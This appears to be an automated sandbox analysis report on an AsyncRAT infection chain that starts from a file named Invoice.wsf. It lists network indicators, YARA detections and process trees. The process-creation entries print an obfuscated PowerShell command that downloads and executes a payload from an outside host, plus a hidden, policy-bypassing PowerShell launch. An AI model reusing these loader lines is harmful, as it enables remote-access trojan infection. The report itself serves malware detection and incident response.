Source: Joe Sandbox View; ASN Name: RELIABLESITEUS
Source: Joe Sandbox View; ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic; HTTP traffic detected: GET /jxs.txt HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: afclifescience-tiurma.com; Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /jxs.txt HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: afclifescience-tiurma.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /rkem.jpg HTTP/1.1; Host: afclifescience-tiurma.com; Connection: Keep-Alive
Source: global traffic; DNS traffic detected: DNS query: afclifescience-tiurma.com
Source: global traffic; DNS traffic detected: DNS query: kareemovic11.duckdns.org
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F05D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://afclifescience-tiurma.com
Source: RegSvcs.exe, 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegSvcs.exe, 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enqq
Source: powershell.exe, 00000001.00000002.1740752837.0000021E9D980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8F44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8D911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238850F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wscript.exe, 00000000.00000002.1753518951.000002092EA81000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://afclifescience-tiurma.LWD
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8ED7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8DB31000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://afclifescience-tiurma.com
Source: wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://afclifescience-tiurma.com/
Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659201525.000002092EA54000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659957741.0000020930681000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659367243.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1752878264.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659992249.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753459649.000002092E8C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1660024016.0000020930686000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://afclifescience-tiurma.com/jxs.txt
Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtLMEMX
Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtWRx
Source: wscript.exe, 00000000.00000003.1660289317.0000020930687000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659957741.0000020930681000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659992249.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1660024016.0000020930686000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtc
Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtkR
Source: wscript.exe, 00000000.00000003.1659201525.000002092EA54000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtsC:
Source: powershell.exe, 00000001.00000002.1717634059.0000021E8BE58000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://afclifescience-tiurma.com/rkem.jpg
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8ED7B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://afclifescience-tiurma.com/rkem.jpgX
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8D911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238850F1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8E4DF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000001.00000002.1740752837.0000021E9D980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8F44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.orgX
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown; Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown; HTTPS traffic detected: 192.185.141.13:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 192.185.141.13:443 -> 192.168.2.4:49731 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match; File source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR

                System Summary

Source: dump.pcap, type: PCAP | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Invoice.wsf | Static file information: Suspicious name
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B821E22
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B822964
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B82458A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B82A7A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B82351A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B825302
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B824B2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFD9B7F1A36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_071F1B10
Source: Invoice.wsf | Initial sample: Strings found which are bigger than 50
Source: dump.pcap, type: PCAP | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, oqwGSofdlOxxXlf.cs | Base64 encoded string: 'oWqliWVaZr9X8SAKoHLtdvQ02xp8ctJW1Ws8BNgrvuiIIol+HlCUlGDdTgOl3EFn/EhvMQuzWAnpzetsGEC+aA==', 'LOlB9LxPxxiqF7JEjXHZfgxYps0j1moVQPZWxqQN5lDMDxEIFiKaejGBKqMTY2tx7JaCbg/i0v8ECQ3bnxILqg==', 'pdckQx7emwUz8cy06clwM6XKGn8yYO79fj6MH8KJTnBfY2wRgTxVafHD/2LEsJV0zZBi6EoCougzdjZUtRRz2OFNpKyWywttTSd5CnYXXFE0QNUxGrDVp/8KUixEHe55OHHORoR7zWVHVbVyQZVoFw==', 'Zpfe7NofWEDy32DJjsCbwZKsfcsZSrZhC876sR++eeGovuViRIWyxkNAikfuAMGa1C5Hxz9ZhN+gE+GMTA2ivyRqoeEBVJLFyJW/ZW8K2pDBHS7kMFvT0QGs2bixkHH+ap1Mx7qlLTxlRQay2xyYK0L5TooU+aBrx3NNGuu2oISI1qT+lcfJYAFGMz7tQDhUmsgndKW4vSqJDopokyY9brrumoZ2HrI7mWdbbGkXiH3gK6JlyMTiwrjXqkhbgR2D7xP3ULYmy5xwE1Pxjc7JZ7dBRAXmv9rQI4tIJOU6PKqjMMam0TY
Source: classification engine | Classification label: mal100.troj.expl.evad.winWSF@13/9@2/2
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\jxs[1].txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3756:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_dikojiosidjoishouisddksjmfnldjvfdonlkd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aazunhzh.wbw.ps1
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
